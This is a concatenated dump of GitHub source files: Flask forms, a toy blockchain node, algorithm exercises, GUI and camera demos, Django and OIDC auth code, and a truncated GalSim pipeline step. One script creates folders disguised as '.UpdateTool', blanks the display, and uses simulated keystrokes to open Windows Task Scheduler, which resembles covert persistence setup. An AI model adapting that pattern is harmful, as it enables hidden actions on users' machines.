/honorifics route\n\t'''\n\n\t# Field: hraw - The raw honorific entry in its native language\n\thraw_validators = [\n\t\tDataRequired(),\n\t\tLength(min=1, max=30)\n\t]\n\thraw = StringField('Raw', validators=hraw_validators)\n\n\t# Field: hraw - The raw honorific entry in its native language\n\thtrans_validators = [\n\t\tDataRequired(),\n\t\tLength(min=1, max=30)\n\t]\n\thtrans = StringField('Translation', validators=htrans_validators)\n\n\t# Field: lang - The native language of the raw honorific provided\n\tlang_selection = sorted([(l.value, l.name) for l in hostmgr.Language])\n\tlang = SelectField(\"Language\", choices=lang_selection, coerce=int, default=lang_selection[0])\n\n\t# Field: affix - Treat this honorific as a suffix or prefix?\n\taffix_validators = [\n\t\tDataRequired(),\n\t]\n\taffix = RadioField('Affix', validators=affix_validators, coerce=int, default=HonorificAffix.SUFFIX.value,\n\t\tchoices=[(HonorificAffix.PREFIX.value, 'Prefix'), (HonorificAffix.SUFFIX.value, 'Suffix')])\n\n\t# Field: opt_with_dash - Option to append a dash character between subject and honorific\n\topt_with_dash = BooleanField(\"Append dash\", default=True)\n\n\t# Field: opt_standalone - Option to indicate that this honorific can potentially be found\n\t# w/out being attached to a subject\n\topt_standalone = BooleanField(\"Standalone\", default=False)\n\n\t# Submit form\n\tsubmit = SubmitField('Save')\n\n\t# Custom validator for hraw\n\tdef validate_hraw(self, hraw):\n\t\thraw_data = hraw.data.strip()\n\t\thonorifics_entry = HonorificsTable.query.filter_by(raw=hraw_data).first()\n\t\tif honorifics_entry is not None:\n\t\t\traise ValidationError(\"%s is already registered\" % hraw_data)\n\nclass EditHonorificForm(FlaskForm):\n\t'''\n\t\tThis form is used when displaying the \"Edit Honorific\" modal to the user\n\t\tin the /honorifics route\n\t'''\n\t# The id of the honorific being edited\n\thon_id = HiddenField(\"Id\")\n\n\t# Field: hraw - The raw honorific entry in its native language\n\thraw_validators = [\n\t\tDataRequired(),\n\t\tLength(min=1, max=30)\n\t]\n\thraw = StringField('Raw', validators=hraw_validators)\n\n\t# Field: hraw - The raw honorific entry in its native language\n\thtrans_validators = [\n\t\tDataRequired(),\n\t\tLength(min=1, max=30)\n\t]\n\thtrans = StringField('Translation', validators=htrans_validators)\n\n\t# Field: lang - The native language of the raw honorific provided\n\tlang_selection = sorted([(l.value, l.name) for l in hostmgr.Language])\n\tlang = SelectField(\"Language\", choices=lang_selection, coerce=int)\n\n\t# Field: affix - Treat this honorific as a suffix or prefix?\n\taffix_validators = [\n\t\tDataRequired(),\n\t]\n\taffix = RadioField('Affix', validators=affix_validators, coerce=int,\n\t\tchoices=[(HonorificAffix.PREFIX.value, 'Prefix'), (HonorificAffix.SUFFIX.value, 'Suffix')])\n\n\t# Field: opt_with_dash - Option to append a dash character between subject and honorific\n\topt_with_dash = BooleanField(\"Append dash\")\n\n\t# Field: opt_standalone - Option to indicate that this honorific can potentially be found\n\t# w/out being attached to a subject\n\topt_standalone = BooleanField(\"Standalone\")\n\n\t# Submit form\n\tsubmit = SubmitField('Save')\n\n\t# Custom validator for hraw\n\tdef validate_hraw(self, hraw):\n\t\t# Submission invalid if there's another HonorificTable entry w/ a diff id but same hraw\n\t\thraw_data = hraw.data.strip()\n\t\tnot_id = HonorificsTable.query.filter(HonorificsTable.id != int(self.hon_id.data))\n\t\tif not_id.filter_by(raw=hraw_data).count() > 0:\n\t\t\traise ValidationError(\"%s is already registered\" % hraw_data)","repo_name":"tahmidk/wn-customtrans","sub_path":"flaskapp/app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":9048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17974742599","text":"# -*- coding utf-8 -*-\n\nfrom utils import *\nimport json\nimport os\nimport requests\nfrom urllib.parse import urlparse\nfrom time import time\nfrom block import Block\nfrom blockchain import BlockChain\nfrom config import *\n\n\nclass Node(object):\n def __init__(self):\n self.chain = BlockChain() # 初始情况,默认先查看本地文件\n self.neighbors = set() # 邻接点\n self.transactions = [] # 交易的集合\n self.new_block = None # 新的区块,用于挖矿\n self.pk, self.sk = self.get_key() # 产生结点的公钥和私钥\n self.port = None\n\n self.add_neighbors() # 初始化邻居节点\n\n def add_neighbors(self):\n \"\"\"\n 添加邻居结点\n :return:\n \"\"\"\n for peers in PEERS:\n if self.port == str(peers).split(':')[2]: # 不能添加自己的地址\n continue\n self.neighbors.add(peers)\n\n @staticmethod\n def get_key():\n \"\"\"\n 获取公钥和私钥,注意字符串和byte之间的转化\n :return: \n \"\"\"\n pk = None\n sk = None\n if not os.path.exists('/node_key.json'): # 不存在就新建\n with open('node_key.json', 'w') as json_file:\n sk = SigningKey.generate(curve=NIST384p)\n pk = sk.get_verifying_key()\n msg = {\n \"pk\": str(pk),\n \"sk\": str(sk.to_string())\n }\n json_file.write(json.dumps(msg, sort_keys=True))\n else:\n with open('node_key.json') as json_file: # 存在直接读取\n msg = json_file.read()\n pk = msg['pk'].encode(\"utf8\") # 转化成bytes\n sk1 = msg['vk'].encode()\n sk = SigningKey.from_string(sk1, curve=NIST384p)\n return pk, sk\n\n def add_new_neighbor(self, address):\n \"\"\"\n 添加新的邻居结点\n :param address: url地址\n :return: \n \"\"\"\n parsed_url = urlparse(address)\n if parsed_url.netloc or parsed_url.path:\n self.neighbors.add(address)\n else:\n raise ValueError('Invalid URL')\n\n def broadcast_transaction(self, transaction):\n \"\"\"\n 向邻接结点广播新的交易\n :return: \n \"\"\"\n for url in self.neighbors:\n try:\n requests.get(url=url + \"/\", timeout=0.2) # 0.2秒的延迟等待,否则就当做掉线处理\n requests.post(url=url + \"/receive_transaction\", data=json.dump(transaction, sort_keys=True))\n except:\n self.neighbors.remove(url) # 删除掉线的结点\n print(\"node\" + url + \" not online !\")\n\n def broadcast_new_block(self, block):\n \"\"\"\n 向其它结点广播挖出的区块\n :param block: 新的区块\n :return: \n \"\"\"\n for url in self.neighbors:\n try:\n requests.get(url=url + \"/\", timeout=0.2) # 0.2秒的延迟等待,否则就当做掉线处理\n requests.post(url=url + \"/get_mined_block\", data=json.dump(block, sort_keys=True))\n return True\n except:\n self.neighbors.remove(url) # 删除掉线的结点\n print(\"node\" + url + \" not online !\")\n return False\n\n def add_new_transaction(self, transaction):\n \"\"\"\n 根据签名合法性添加新的交易\n :return: \n \"\"\"\n pk_string = str(transaction['sender'])\n signature = transaction['signature']\n message = json.dump(transaction['message'], sort_keys=True)\n # 签名正确,而且不是重复的交易\n if is_valid_transaction(pk_string, message, signature) and transaction not in self.transactions:\n self.broadcast_transaction(transaction)\n self.transactions.append(transaction)\n return True\n return False\n\n def add_new_block(self, block):\n \"\"\"\n 添加新的区块,为了验证其它区块挖矿的合理性\n :param block: block\n :return: \n \"\"\"\n if proof_of_work(self.chain.last_block, block):\n # 处理交易,并且添加新的区块\n self.chain.last_block.transaction.append(self.transactions)\n self.transactions.clear()\n self.chain.add_block(block)\n return True\n return False\n\n def get_new_chain(self):\n \"\"\"\n 对于新上线的结点,需要获得最长的有效的区块链\n :return: \n \"\"\"\n for url in self.neighbors:\n try:\n reponse = requests.get(url=url + \"/chain\", timeout=0.2) # 获取区块链的数据\n except:\n self.neighbors.remove(url) # 删除掉线的结点\n print(\"node\" + url + \" not online !\")\n continue\n # length = reponse['length']\n chain = reponse['chain']\n # 最长的有效区块链\n self.chain.resolve_conflicts(chain)\n\n def mine(self):\n \"\"\"\n 产生新的区块,相当于挖矿\n :return: 新的区块\n \"\"\"\n # 挖矿之前,需要先和其它结点达成共识\n self.get_new_chain()\n\n nonce = 0\n last_block = self.chain[-1]\n while not proof_of_work(last_block, nonce):\n nonce += 1\n\n message = {\n \"receiver\": self.pk, # 发给自己\n \"amount\": 1, # 奖励的数目\n \"data\": \"a new block\", # 一些其他的信息\n }\n transaction = {\n \"sender\": \"0\", # 发送者为0\n \"signature\": \"0\", # 签名为0\n \"message\": message # 自定义的消息\n }\n msg = {\n \"index\": len(self.chain.blocks),\n \"time_stamp\": time(),\n \"previous_hash\": last_block.current_hash,\n \"nonce\": nonce,\n \"data\": \"\",\n \"transaction\": transaction\n }\n # 挖出新的区块后,需要把交易追加到最后一个区块中,同时清空交易缓存\n last_block = self.chain.last_block\n last_block.transactions.append(self.transactions)\n transaction.clear()\n # 追加新的区块\n block = Block(msg)\n self.chain.add_block(block)\n return block\n","repo_name":"StudentErick/Blockchains","sub_path":"Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":6433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14105495024","text":"# Sequential Search\n# Best case O(1), worst case O(n)\n# For unordered list\ndef seq_search(arr, element):\n pos = 0\n found = False # This variable will become True when we get the element.\n while pos < len(arr) and not found:\n\n if arr[pos] == element:\n found = True\n\n else:\n pos += 1\n\n return found\n\n# For ordered/sorted list/array\n\n\ndef ordered_seq_search(arr, element):\n pos = 0\n found = False # This variable will become True when we get the element.\n stopped = False # To make sure we iterate till we get the element or just greater than the element and hance avoivding full array search\n while pos < len(arr) and not found and not stopped:\n\n if arr[pos] == element:\n found = True\n\n else:\n if arr[pos] > element:\n stopped = True\n else:\n pos += 1\n\n return found\n\n\ndef check(expected, output):\n rightTick = '\\u2713'\n wrongTick = '\\u2717'\n if expected == output:\n print(rightTick, 'Test passed.')\n\n else:\n print(wrongTick, 'Test failed.')\n\n\nif __name__ == '__main__':\n expected1 = True\n arr1 = [1, 2, 6, 4, 5, 9, 3]\n output1 = seq_search(arr1, 5)\n check(expected1, output1)\n\n expected2 = False\n arr2 = [1, 2, 3, 4, 5, 6, 9]\n output2 = ordered_seq_search(arr2, 8)\n check(expected2, output2)\n","repo_name":"rameshwarsingh11/data-structure-practice","sub_path":"seq_search.py","file_name":"seq_search.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71155080806","text":"\n\ncol, row = map(int, input().split())\n\nN = int(input())\n\nrows = [0, row]\ncols = [0, col]\n\nfor n in range(N):\n which_one, cut = map(int, input().split())\n\n if which_one == 0:\n rows.append(cut)\n elif which_one == 1:\n cols.append(cut)\n\n\nrow_gap = 0\ncol_gap = 0\n\nrows = sorted(rows)\ncols = sorted(cols)\n\n\nfor r in range(len(rows) -1):\n gap = rows[r+1] -rows[r]\n if gap > row_gap:\n row_gap = gap\n\n\nfor c in range(len(cols) -1):\n gap = cols[c+1] - cols[c]\n if gap > col_gap:\n col_gap = gap\n\nprint(row_gap*col_gap)","repo_name":"chloe-codes1/algorithm","sub_path":"Baekjoon/Probs/2628_종이자르기.py","file_name":"2628_종이자르기.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21666754237","text":"import string\nfrom turtle import Turtle\n\n\nclass Car(Turtle):\n def __init__(self, position: tuple, color: string) -> None:\n super().__init__()\n self.penup()\n self.color(color)\n self.shape(\"square\")\n self.shapesize(stretch_wid=1, stretch_len=2)\n self.goto(position)\n self.setheading(180)\n\n def move(self, move_distance):\n self.forward(move_distance)\n","repo_name":"arbenkryemadhi/100-days-of-code-python","sub_path":"Exercises/23 The Turtle Crossing Project/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"19231228239","text":"# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n\n# private methods\n\n\nclass Mapping:\n def __init__(self, iterable):\n self.items_list = []\n self.__update(iterable)\n\n def update(self, iterable):\n print(\"Calling `update` in `Mapping` class\")\n for item in iterable:\n self.items_list.append(item)\n\n __update = update # private copy of original update() method\n\n\nclass MappingSubclass(Mapping):\n def update(self, keys, values):\n # provides new signature for update()\n # but does not break __init__()\n print(\"Calling `update` in `MappingSubclass` class\")\n for item in zip(keys, values):\n self.items_list.append(item)\n\n __update = update\n\n\n# %%\nms = MappingSubclass([1, 2, 3])\n\n# %%\nms._Mapping__update([7, 8, 9]) # type: ignore\nms.items_list\n\n\n# %%\nms._MappingSubclass__update([1, 2, 3], [7, 8, 9]) # type: ignore\nms.items_list\n\n# %%\n\n\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# Private vs Protected methods\n\n\nclass Thing:\n def __init__(\n self, public: str, *, protected: str = \"protected\", private: str = \"private\"\n ):\n self.public = public\n self._protected = protected\n self.__private = private\n\n def info(self) -> None:\n print(\n (\n f\"This class has public attribute: {self.public}, \"\n f\"protected attribute: {self._protected}, \"\n f\"and private attribute: {self.__private}\"\n )\n )\n\n\n# %%\n\nthing = Thing(\"public\")\n\n# this is fine because it is assessing the variables internally in the info method\nthing.info()\n\n# this is also fine because the public attribute is indeed public\nprint(thing.public)\n\n# this will run but will give an error when checked with pylance\nprint(thing._protected)\n\n# %%%\n# this will not actually run and will raise an AttributeError but it will also give an error when checked\nprint(thing.__private)\n'\"__private\" is private and used outside of the class in which it is declared'\n\n\n# %%\n\n# Inheritance\n\nclass SomeThing(Thing):\n def more_info(self) -> None:\n print(\n f\"This class has public attribute: {self.public}, protected attribute: {self._protected}\"\n )\n\n def use_private(self) -> None:\n print(f\"Private attribute is {self.__private}\")\n\n\n# %%%\nsome_thing = SomeThing(\"public\")\n\n# still can use the info method which uses the private attribute internally\nsome_thing.info()\n\n# can use the new more_info method that uses the public and protected attribute\nsome_thing.more_info()\n\n# %%\n\n# this will raise an AttributeError and will also give an error when checked\nsome_thing.use_private()\n","repo_name":"aerosadegh/AdvancedPythonTopics","sub_path":"topics/01-class/00-class-introduction.py","file_name":"00-class-introduction.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1219445535","text":"\"\"\"Exercise 8-14\"\"\"\n\n\ndef make_car(manufacturer, model, **other_specs):\n \"\"\"stores information about a car in a dictionary. and then prints it.\"\"\"\n print(\"\\nCar details:\")\n\n car_dict = {\n 'manufacturer': manufacturer.title(),\n 'model': model.title(),\n }\n\n for spec, value in other_specs.items():\n car_dict[spec] = value\n\n return car_dict\n\n\ncar_0 = make_car('benz', 'E500',\n color='white',\n tow_package=True,\n motor='3500ml',\n headlights='popup',\n year=2016)\nprint(car_0)\n","repo_name":"RunnerOnFoot/PCC","sub_path":"Chapter_8/Exercises/cars.py","file_name":"cars.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30941949554","text":"import time\nimport picamera\n\neffects = ['none', 'negative', 'sketch', 'oilpaint', 'film']\n\nwith picamera.PiCamera() as camera:\n camera.resolution = (1024, 768)\n camera.start_preview()\n # Camera warm-up time\n time.sleep(2)\n print(\"Picture in 3..\")\n time.sleep(1)\n print(\"2...\")\n time.sleep(1)\n print(\"1...\")\n time.sleep(1)\n for i in range(5):\n camera.image_effect = effects[i]\n camera.capture('effect_' + str(i+1) + '.jpg')\n print(\"Pictures taken!\")\n","repo_name":"clyman88/Engineering_4_Notebook","sub_path":"Pics/camera_test_02.py","file_name":"camera_test_02.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29937740194","text":"import random\n\nclass Team:\n\tdef __init__(self, name):\n\t\tself.heroes = list()\n\t\tself.name = name\n\t\n\tdef add_hero(self, hero):\n\t\tself.heroes.append(hero)\n\n\tdef remove_hero(self, name):\n\t\tfoundHero = False\n\t\tfor hero in self.heroes:\n\t\t\tif hero.name == name: \n\t\t\t\tself.heroes.remove(hero)\n\t\t\t\tfoundHero = True\n\t\tif not foundHero:\n\t\t\treturn 0\n\n\tdef view_all_heroes(self):\n\t\tfor hero in self.heroes: \n\t\t\tprint(f\"{hero.name}\")\n \n\n\tdef stats(self):\n\t\tfor hero in self.heroes: \n\t\t\tif hero.deaths > 0:\n\t\t\t\tkd = hero.kills / hero.deaths\n\t\t\telse: \n\t\t\t\tkd = hero.kills\n\t\t\tprint(f\"{hero.name} Kill/Deaths:{kd}\")\n\n\tdef revive_heroes(self, health=100):\n\t\tfor hero in self.heroes:\n\t\t\thero.current_health = hero.starting_health\n\n\tdef attack(self, other_team):\n\t\tliving_heroes = list()\n\t\tliving_opponents = list()\n\n\t\tfor hero in self.heroes: \n\t\t\tliving_heroes.append(hero)\n\n\t\tfor hero in other_team.heroes:\n\t\t\tliving_opponents.append(hero)\n\n\t\twhile len(living_heroes) > 0 and len(living_opponents) > 0:\n\t\t\tfighting_hero = random.choice(living_heroes)\n\t\t\tfighting_opponent = random.choice(living_opponents)\n\n\t\t\tif fighting_hero.fight(fighting_opponent) == 1:\n\t\t\t\tliving_heroes.remove(fighting_hero)\n\t\t\telse:\n\t\t\t\tliving_opponents.remove(fighting_opponent) \n","repo_name":"bakedoatmeal/superheroes-dueler","sub_path":"team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8742869727","text":"\ndef on_clicked():\n print(\"Кнопка нажата\")\n\n\nfrom PySide import QtCore, QtGui\nimport sys\n\n\nclass SampleWindow(QtGui.QWidget):\n def __init__(self):\n super(SampleWindow, self).__init__()\n\n\nwindow.setWindowTitle(\"Класс QPushButton\")\nwindow.resize(300, 80)\nbutton = QtGui.QPushButton(\"Кнопка\")\nbutton.clicked.connect(on_clicked)\nbutton.setAutoRepeat(True)\nhbox = QtGui.QHBoxLayout()\nhbox.addWidget(button)\nwindow.setLayout(hbox)\n","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/PyQt_PySide_book/004_Main components/002_Command button/181_setAutoRepeat - toClass.py","file_name":"181_setAutoRepeat - toClass.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"71781659044","text":"# pynputv1.7 by .py to .exe defect, use \"pip install pynput==1.6.8\"\nimport time\nimport os\nfrom pynput.keyboard import Key, Controller as KeyboardController\nfrom pynput.mouse import Button, Controller as MouseController\nkeyboard = KeyboardController()\nmouse = MouseController()\n\n#variablen gleich dem anderem programm wo das hier implementiert werden soll\n\n#temppath zu python holen\ntmp = os.environ.get('TMP')\n\n# homepath zu python holen\nhome = os.environ.get('homepath')\n\n# newpath festlegen\nnewpath_home = home + r'\\.UpdateTool'\nnewpath_tmp = tmp + r'\\UpdateTool'\n\n\n# falls newpath nicht existiert erstelle ihn\nif not os.path.exists(newpath_home):\n os.makedirs(newpath_home)\nif not os.path.exists(newpath_tmp):\n os.makedirs(newpath_tmp)\n\n\n#default sleep time\ndst = 1\n\n\n#testprozedur\ndef proz(z):\n file = open(newpath_tmp + r'\\keyboardtest.txt', 'a+')\n file.write(str(z) + \"\\n\")\n file.close()\n\n#os.system(r'cmd /c \"C:\\Users\\danie\\Git\\Python\\sonstiges\\sound_rec\\displaydown.exe monitor off\"')\n#os.system(r'cmd /c \"\"')\n\n# Ausführung öffnen\nkeyboard.press(Key.cmd)\nkeyboard.press('r')\nkeyboard.release('r')\nkeyboard.release(Key.cmd)\n\ntime.sleep(dst)\n\nkeyboard.type('taskschd.msc')\nkeyboard.press(Key.enter)\nkeyboard.release(Key.enter)\n\ntime.sleep(5)\nprint(\"scheduled task musste nun bearbeitet werden\")\n#os.system(r'cmd /c \"C:\\Users\\danie\\Git\\Python\\sonstiges\\sound_rec\\displaydown.exe monitor off\"')\nkeyboard.tap(Key.cmd)\n#keyboard.press('t')\n#keyboard.release('t')\n\n","repo_name":"DanielMueller1309/Python","sub_path":"sonstiges/keyboard-mouse/keyboard2.py","file_name":"keyboard2.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2998466281","text":"import pytest as pytest\nfrom django.test import Client\nfrom django.urls import reverse\n\n\n# Create your tests here.\ndef test_configuration():\n \"\"\"Test that configuration is OK.\"\"\"\n assert True\n\n\n@pytest.mark.django_db\ndef test_base_view():\n \"\"\"Test that base view is working.\"\"\"\n client = Client()\n url = reverse('base')\n response = client.get(url)\n assert response.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_base_view_content():\n \"\"\"Test that base view is working.\"\"\"\n client = Client()\n url = reverse('base')\n response = client.get(url)\n assert 'Katemath' in response.content.decode()\n","repo_name":"CezarySzukiel/ProjectKate","sub_path":"base_app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10445174538","text":"from typing import Tuple\nfrom requests.exceptions import HTTPError\n\nfrom mozilla_django_oidc.contrib.drf import OIDCAuthentication\n\nfrom django.utils import timezone\n\nfrom rest_framework import exceptions\n\nfrom scouts_auth.auth.exceptions import ScoutsAuthException\n\n\n# LOGGING\nimport logging\nfrom scouts_auth.inuits.logging import InuitsLogger\n\nlogger: InuitsLogger = logging.getLogger(__name__)\n\n\nclass InuitsOIDCAuthentication(OIDCAuthentication):\n\n def authenticate(self, request) -> Tuple:\n \"\"\" \"\n Call parent authenticate but catch HTTPError 401 always,\n even without www-authenticate.\n \"\"\"\n try:\n logger.debug(\n \"OIDC AUTHENTICATION: Authenticating user with OIDC backend\")\n\n # This calls get_or_create_user() in ScoutsOIDCAuthenticationBackend\n result = super().authenticate(request)\n\n if result is None:\n return None\n\n if isinstance(result, tuple):\n (user, token) = result\n\n now = timezone.now()\n\n user.last_authenticated = now\n user.updated_on = now\n\n user.full_clean()\n user.save()\n\n return (user, token)\n except HTTPError as exc:\n logging.error(\n \"SCOUTS-AUTH: Authentication error: %s\", exc.response.json()\n )\n\n response = exc.response\n # If oidc returns 401 return auth failed error\n if response.status_code == 401:\n raise ScoutsAuthException(\n \"SCOUTS-AUTH: 401 Unable to authenticate: \" +\n response.json().get(\"error_description\", response.text)\n )\n\n raise\n","repo_name":"ScoutsGidsenVL/kampvisum-backend","sub_path":"scouts_kampvisum_api/scouts_auth/auth/oidc_auth.py","file_name":"oidc_auth.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34572513348","text":"# This program is used to Play TIC TAC TOE\nimport array\n\ndef play_logic(num,list,lis,n):\n if n==1:\n valus = num()\n i,j=lis[valus]\n list[i][j]=\"x\"\n ns=2\n elif n==2:\n valus = num()\n i,j=lis[valus]\n list[i][j]=\"o\"\n ns=1\n return list,ns\n\ndef user_input():\n valus = int(input(\"Enter the postion as input:\\n\"))\n return valus\n\n# play_logic()\nif __name__ ==\"__main__\":\n list = [[0, 0, 0],[0, 0, 0],[0, 0, 0]]\n lis= [[0,0],[0,1],[0,2],[1,0],[1,1],[1,2],[2,0],[2,1],[2,2]]\n count = 0\n n = 1\n while True:\n if n==1:\n list,n = play_logic(user_input,list,lis,n)\n print(list[0],end =\" \")\n print(\" | 0 | 1 | 2 |\")\n print(list[1],end =\" \")\n print(\" | 3 | 4 | 5 |\")\n print(list[2],end =\" \")\n print(\" | 6 | 7 | 8 |\")\n count = count+1\n print(count,\"1\")\n\n elif n==2:\n list,n = play_logic(user_input,list,lis,n)\n print(list[0],end =\" \")\n print(\" | 0 | 1 | 2 |\")\n print(list[1],end =\" \")\n print(\" | 3 | 4 | 5 |\")\n print(list[2],end =\" \")\n print(\" | 6 | 7 | 8 |\")\n count = count+1\n print(count,\"2\")\n\n elif count <= 9:\n break\n\n # print(play_logic(user_input,list,lis))\n","repo_name":"KrishothKumar/Python_Practice","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71591097445","text":"#! /usr/bin/python3\nfrom sudoku import Sudoku\nfrom api import API\nimport os\nimport string\n\nclass Interfaz:\n\n def __init__(self, tamaño=None):\n os.system(\"clear\")\n print(\"\\nBienvenido a Sudoku\")\n\n if tamaño is None:\n self.tamaño=0\n while(True):\n self.tamaño=int(input(\"\\nIngrese el tamaño deseado (4 o 9): \"))\n if(self.tamaño!=4 and self.tamaño!=9):\n os.system(\"clear\")\n print(\"\\nError al ingresar tamaño, intente nuevamente\")\n else:\n return None\n elif(tamaño==4 or tamaño==9):\n self.tamaño=tamaño\n else:\n print(\"\\nParametro de tamaño invalido\")\n print(\"\\nSaliendo...\")\n\n def inicio(self):\n self.generar_tablero()\n self.generar_logica()\n self.jugar()\n\n def generar_tablero(self):\n self.api=API() #creo objeto api\n self.tablero=self.api.crear_api(self.tamaño) #genero tablero y asigno\n return self.tablero\n\n def generar_logica(self):\n self.logica=Sudoku(self.tablero,self.tamaño) #genero objeto logico\n\n def obtener_valores(self):\n self.row=int(input(\"\\nIngrese la fila que desea modificar (1-{}): \".format(self.tamaño)))\n self.column=int(input(\"\\nIngrese la columna que desea modificar (1-{}): \".format(self.tamaño)))\n self.value=int(input(\"\\nIngrese el valor a insertar en la posicion ({},{}): \".format(self.row,self.column)))\n self.coordinates=self.row-1, self.column-1\n return self.coordinates, self.value\n\n def jugar(self):\n while(True):\n print(\"\"\"\\n MENU\\n\\n1-Imprimir Sudoku\\n2-Modificar valor\\n3-Salir\"\"\")\n decision=input(\"Que desea hacer ? \")\n os.system(\"clear\")\n if(decision=='1'):\n print(self.logica.imprimir_tablero()) \n elif(decision=='2'):\n os.system(\"clear\")\n print(self.logica.imprimir_tablero()) \n self.obtener_valores()\n #verifico que no se transgredan las reglas\n if(self.logica.modificar_tablero(self.coordinates,self.value)[0]):\n os.system(\"clear\")\n print(\"\\nModificando...\\n\\n\")\n print(self.logica.imprimir_tablero())\n #verifico victoria\n if(self.logica.verificar_victoria()):\n print(\"\\nFELICITACIONES HAS GANADO !!!\")\n return False\n #si se transgreden las reglas\n else:\n os.system(\"clear\")\n print(\"\\n***ERROR*** -> \",end=\"\")\n print(self.logica.modificar_tablero(self.coordinates,self.value)[1])\n print(\"\\nVuelva a intentar...\")\n #menu de salida\n elif(decision=='3'):\n (os.system(\"clear\"))\n decision2=input(\"\\nSe perdera el progreso. Confirme (Y) \")\n if(decision2=='y' or decision2=='Y'):\n print(\"\\nSaliendo...\")\n return False\n else:\n print(\"\\n*Error* - Opcion inexistente, vuelva a intentar\")\n \n\nif __name__=='__main__':\n interfaz=Interfaz()\n interfaz.inicio()","repo_name":"igncarrillo/Sudoku_v2","sub_path":"interfaz.py","file_name":"interfaz.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16746496670","text":"from __future__ import print_function, absolute_import\nimport os\nimport pprint\n\nimport numpy as np\nimport galsim\nimport galsim.config\nimport fitsio\nimport eastlake\n\nfrom eastlake.step import Step\nfrom .utils import safe_mkdir, get_truth_from_image_file, safe_rm\nfrom eastlake.rejectlist import RejectList\nfrom eastlake.des_files import read_pizza_cutter_yaml\n\n\ndef read_galsim_truth_file(fname):\n \"\"\"read a galsim truth file to a structured numpy array\"\"\"\n import pandas as pd\n\n if not os.path.getsize(fname):\n return None\n\n ncomment = 0\n ndata = 0\n with open(fname, \"r\") as fp:\n lines = fp.readlines()\n for line in lines:\n line = line.strip()\n if len(line) == 0 or line.startswith(\"#\"):\n ncomment += 1\n else:\n ndata += 1\n\n if ndata > 0 and ncomment == 0:\n raise RuntimeError(\"No header line found for truth file %r!\" % fname)\n\n if ndata == 0:\n return None\n else:\n df = pd.read_csv(fname, skiprows=[0], sep=r\"\\s+\", index_col=False, header=None)\n with open(fname, \"r\") as fp:\n h = fp.readline().strip().split()[1:]\n df.columns = h\n stringcols = df.select_dtypes(include='object').columns\n _d = df.to_records(index=False, column_dtypes={c: \"U1\" for c in stringcols})\n return _d\n\n\nclass MontaraGalSimRunner(Step):\n \"\"\"\n Pipeline step which runs galsim\n\n The config attribute is a little different here, since it is updated when\n running GalSim\n \"\"\"\n\n def __init__(\n self, config, base_dir, name=\"galsim\", logger=None, verbosity=0, log_file=None\n ):\n super().__init__(\n config, base_dir, name=name, logger=logger, verbosity=verbosity,\n log_file=log_file)\n self.config['output']['dir'] = base_dir\n\n if self.config[\"output\"][\"type\"] == \"MultibandMEDS\":\n if \"truth\" in self.config[\"output\"]:\n if \"dir\" in self.config[\"output\"][\"truth\"]:\n if not os.path.isabs(\n self.config[\"output\"][\"truth\"][\"dir\"]):\n self.config[\"output\"][\"truth\"][\"dir\"] = os.path.join(\n base_dir, self.config[\"output\"][\"truth\"][\"dir\"])\n\n # For the downstream interpretation of these sims, it's going to be\n # quite important to have various quantities saved in the truth files.\n # And that the column names correspond to what we expect them to...so\n # do a bit of enforcement of that here.\n output = self.config[\"output\"]\n if output[\"type\"] in [\"DESTile\"]:\n if \"truth\" not in output:\n output[\"truth\"] = {}\n output[\"truth\"][\"colnames\"] = {}\n x_str = \"image_pos.x\"\n y_str = \"image_pos.y\"\n p_str = \"image_pos\"\n if \"stamp\" in self.config:\n if \"offset\" in self.config[\"stamp\"]:\n x_str += \" + (@stamp.offset).x\"\n y_str += \" + (@stamp.offset).y\"\n p_str += \" + (@stamp.offset)\"\n\n add_to_truth = {\n \"id\": \"$tile_start_obj_num + obj_num - start_obj_num\",\n \"flux\": \"$float((@current_obj).flux)\",\n \"mag\": \"$-2.5*np.log10((@current_obj).flux) + mag_zp\",\n \"x\": \"$%s\" % x_str,\n \"y\": 